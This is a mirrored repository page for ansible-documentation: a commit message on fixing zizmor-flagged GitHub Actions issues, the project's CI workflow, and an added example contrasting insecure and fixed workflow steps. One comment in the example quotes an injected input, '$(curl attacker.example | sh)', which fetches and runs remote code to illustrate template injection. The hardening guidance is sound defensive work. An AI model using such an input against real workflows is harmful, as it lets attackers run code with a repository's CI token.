mirror of
https://github.com/ansible/ansible-documentation.git
synced 2026-03-27 13:28:51 +07:00
* ci: fix issues identified by zizmor GHA linter

  This fixes issues identified by the zizmor linter which checks for GitHub Actions security best practices.

  Summary of changes:

  - Remove possibilities for shell injection. These can all only be activated by workflow_dispatch input provided by people who already have access to the repository, but still a good idea to tidy this up. Many of these occur in the build-package-docs actions. We should test everything to make sure nothing is broken by these changes.
  - Explicitly set permissions. This is not strictly required, because we already enforce a limited set of default permissions in the repo's GHA settings, but zizmor wants us to be explicit.
  - Use `persist-credentials: false` with the checkout action.

  Also, when rebasing this commit, I added back the manual `nox -s clone-core` step to keep the outputs separate.

* ci: run zizmor in CI and noxfile

  - Adds lockfile
  - Adds nox session
  - Adds nox session to CI matrix

* ci: fix additional issues identified by zizmor

  - Add default permissions to new workflows
  - Add cooldown to dependabot

* ci: add zizmor configuration for unpinned-uses

  We could configure dependabot to pin shared workflow commit SHA hashes, but for now, let's relax the unpinned-uses relax

* ci: restore secrets: inherit for pip-compile workflows

  See comment for more details.

* ci: fix token auth for pip-compile workflow

* README: mention that lint session runs GHA checks

* Update noxfile.py

  Co-authored-by: Don Naro <dnaro@redhat.com>

* nox zizmor: allow overriding persona

* nox: actually run zizmor as part of lint session

* ci: use GHA expression instead of shell test

  Co-authored-by: 🇺🇦 Sviatoslav Sydorenko (Святослав Сидоренко) <wk@sydorenko.org.ua>

* ci: use Python to avoid shell+json quoting issues

---------

Co-authored-by: Don Naro <dnaro@redhat.com>
Co-authored-by: 🇺🇦 Sviatoslav Sydorenko (Святослав Сидоренко) <wk@sydorenko.org.ua>
39 lines
698 B
YAML
```yaml
name: Ansible Docsite CI

"on":
  schedule:
    # Daily
    - cron: "23 7 * * *"
  push:
    branches-ignore:
      - 'patchback/**'
      - 'pip-compile/**'
  pull_request:
    types:
      - opened  # default
      - synchronize  # default
      - reopened  # default
      - ready_for_review  # used in PRs created from GitHub Actions workflows
  workflow_dispatch:

permissions:
  contents: read

jobs:
  nox:
    uses: ./.github/workflows/reusable-nox.yml

  check:
    if: always()

    needs:
      - nox

    runs-on: ubuntu-latest

    steps:
      - name: Decide whether the needed jobs succeeded or failed
        uses: re-actors/alls-green@release/v1
        with:
          jobs: ${{ toJSON(needs) }}
```
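The commit message names three classes of zizmor finding that the workflow above was cleaned up for: `${{ }}` expressions inside `run:` scripts (shell injection), a missing top-level `permissions` block, and `actions/checkout` left at its default `persist-credentials: true`. The workflow below is an added example, not part of the original page or of the ansible-documentation repository; it shows each flagged pattern beside the fix in one file. The workflow name, the `target` input and the `flagged`/`fixed` job names are hypothetical.

```yaml
# Added example (not from the ansible-documentation repository): the three
# zizmor findings named in the commit message, each shown as the flagged
# pattern beside its fix. Workflow name, `target` input and job names are
# hypothetical.
name: zizmor example

"on":
  workflow_dispatch:
    inputs:
      target:
        description: Docs target to build
        required: true
        type: string

# Finding: without a top-level `permissions` block every job inherits the
# repository's default GITHUB_TOKEN scope. Fix: grant only what the jobs need.
permissions:
  contents: read

jobs:
  flagged:
    runs-on: ubuntu-latest
    steps:
      # Finding (persist-credentials): the default (true) stores the
      # GITHUB_TOKEN in .git/config, where every later step can read it.
      - uses: actions/checkout@v4

      # Finding (template-injection): `${{ }}` is expanded by the runner
      # before the shell parses the script, so an input such as
      #   $(curl attacker.example | sh)
      # is pasted into the command line and executed with the job's token.
      - run: echo "Building ${{ inputs.target }}"

  fixed:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          persist-credentials: false

      # Hand the input to the shell through an environment variable: bash
      # expands "${TARGET}" as data, so the raw input text is never parsed
      # as shell syntax.
      - env:
          TARGET: ${{ inputs.target }}
        run: echo "Building ${TARGET}"
```

The `@v4` tag on `actions/checkout` is what zizmor's `unpinned-uses` check flags; the commit message chooses to relax that check in configuration rather than pin to a commit SHA, so this example leaves the tag as-is.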